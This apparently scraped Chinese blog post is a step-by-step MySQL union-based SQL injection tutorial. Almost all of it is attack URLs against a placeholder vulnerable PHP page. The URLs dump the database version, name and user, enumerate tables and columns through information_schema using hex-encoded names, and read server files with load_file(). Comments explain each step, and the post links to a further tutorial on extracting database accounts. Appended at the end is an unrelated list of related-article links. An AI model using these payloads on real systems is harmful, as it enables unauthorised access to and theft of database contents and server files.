zoukankan      html  css  js  c++  java
  • MYSQL高级注入实例

    ###########################################
    #MYSQL高级注入实例
    ###########################################

    -----------------------------------系统信息 -------------------------------------------
    http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 1,2,version(),4,5
    ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××

    http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 1,2,database(),4,5
    ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××

    http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 1,2,user(),4,5


    --------------------------------爆数据库的表 -------------------------------------------------
    http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 0,0,concat(table_name),0,0 from (select * from (select * from information_schema.tables where table_schema=0x61797363 order by table_schema limit 0,1) t order by table_schema desc)t limit 1--       /0x61797363是爆出的数据库aysc(database())的16进制 爆出位置0的表 注意从0开始
    ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××


    http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 0,0,concat(table_name),0,0 from (select * from (select * from information_schema.tables where table_schema=0x61797363 order by table_schema limit 2,1) t order by table_schema desc)t limit 1--       /爆出位置2的表

    ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××

    http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 0,0,concat(table_name),0,0 from (select * from (select * from information_schema.tables where table_schema=0x61797363 order by table_schema limit 10,1) t order by table_schema desc)t limit 1--       /爆出位置10的表


    ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××

    -------------------------------爆出字段 -------------------------------------------------------------
    http://www.vulnsite.com//renwu.php?id=10 and 1=2 union select 0,0,concat(cast(count(*) as char)),0,0 from information_schema.columns   where table_name=0x6364625f696d6167657479706573 and table_schema=0x61797363 limit 1--     /0x6364625f696d6167657479706573是选择一个表 0x61797363是数据库账户 16进制  
    //爆出含有多少字段

    ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××


    http://www.vulnsite.com//renwu.php?id=10 and 1=2 union select 0,0,concat(column_name),0,0 from (select * from (select * from information_schema.columns where table_name=0x6364625f696d6167657479706573 and table_schema=0x61797363 order by 1 limit 0,1) t order by 1 desc)t limit 1--
    //爆出数据库账户 0x61797363 中的表 0x6364625f696d6167657479706573 的 0 位置 的字段 (必须转换16进制)

    ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××

    http://www.vulnsite.com//renwu.php?id=10 and 1=2 union select 0,0,concat(column_name),0,0 from (select * from (select * from information_schema.columns where table_name=0x6364625f696d6167657479706573 and table_schema=0x61797363 order by 1 limit 1,1) t order by 1 desc)t limit 1--

    ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××

    //爆出数据库账户 0x61797363 中的表 0x6364625f696d6167657479706573 的 1 位置 的字段 (必须转换16进制)

    -----------------------------爆出数据数据 ----------------------------------------------------------------

    联合查询
    这个不说了

    -----------------------------跨库?得到数据库账户?--------------
    参考我的教程 php注入爆数据库账户
    http://u.115.com/file/f86e56c2cb

    ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××

    -----------------------------读数据文件--------------
    /renwu.php?id=10 and 1=2 union select 0,0,concat(load_file(16进制的地址)),0,0 --


    Reference:
    [1]http://www.ptsecurity.com/download/PT-devteev-FAST-blind-SQL-Injection.pdf


    =========================================================
  • 相关阅读:
    cmd中输入vue ui不起作用
    win10下如何让别人访问自己的数据库,开放3306端口
    maven出现报错:Failed to execute goal on project ***** Could not resolve dependencies for project com.**.**.**:jar:0.0.1-SNAPSHOT: Could not find artifact:jar:1.0-SNAPSHOT -> [Help 1]
    vue中改变字体大小,px不起作用
    vue安装教程
    Springboot快速入门
    【POI】Excel数据导入
    【MySQL】替换件需求
    【Git】Gitlab仓库访问拒绝,SSL校验影响
    【MySQL】java.sql.SQLException: Illegal mix of collations (utf8mb4_0900_ai_ci,IMPLICIT) and (utf8mb4_general_ci,IMPLICIT) for operation '='
  • 原文地址:https://www.cnblogs.com/swane/p/2003272.html
Copyright © 2011-2022 走看看